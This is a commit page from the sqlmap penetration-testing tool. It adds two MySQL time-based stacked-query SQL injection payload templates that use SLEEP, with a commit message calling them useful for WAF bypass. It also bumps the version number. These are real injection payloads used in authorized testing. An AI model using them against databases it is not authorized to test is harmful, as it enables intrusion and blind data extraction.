Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 3a9e36c

Browse files
committed
Reintroducing stacked queries removed in 79d0890 (good for WAF bypass)
1 parent cb43c03 commit 3a9e36c

2 files changed

Lines changed: 42 additions & 1 deletion

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.revision import getRevisionNumber
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.0.6.66"
22+
VERSION = "1.0.6.67"
2323
REVISION = getRevisionNumber()
2424
STABLE = VERSION.count('.') <= 2
2525
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")

xml/payloads/04_stacked_queries.xml

Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -43,6 +43,47 @@
4343
</details>
4444
</test>
4545

46+
<test>
47+
<title>MySQL &gt; 5.0.11 stacked queries (SLEEP - comment)</title>
48+
<stype>4</stype>
49+
<level>2</level>
50+
<risk>1</risk>
51+
<clause>0</clause>
52+
<where>1</where>
53+
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
54+
<request>
55+
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
56+
<comment>#</comment>
57+
</request>
58+
<response>
59+
<time>[SLEEPTIME]</time>
60+
</response>
61+
<details>
62+
<dbms>MySQL</dbms>
63+
<dbms_version>&gt; 5.0.11</dbms_version>
64+
</details>
65+
</test>
66+
67+
<test>
68+
<title>MySQL &gt; 5.0.11 stacked queries (SLEEP)</title>
69+
<stype>4</stype>
70+
<level>3</level>
71+
<risk>1</risk>
72+
<clause>0</clause>
73+
<where>1</where>
74+
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
75+
<request>
76+
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
77+
</request>
78+
<response>
79+
<time>[SLEEPTIME]</time>
80+
</response>
81+
<details>
82+
<dbms>MySQL</dbms>
83+
<dbms_version>&gt; 5.0.11</dbms_version>
84+
</details>
85+
</test>
86+
4687
<test>
4788
<title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
4889
<stype>4</stype>

0 commit comments

Comments
 (0)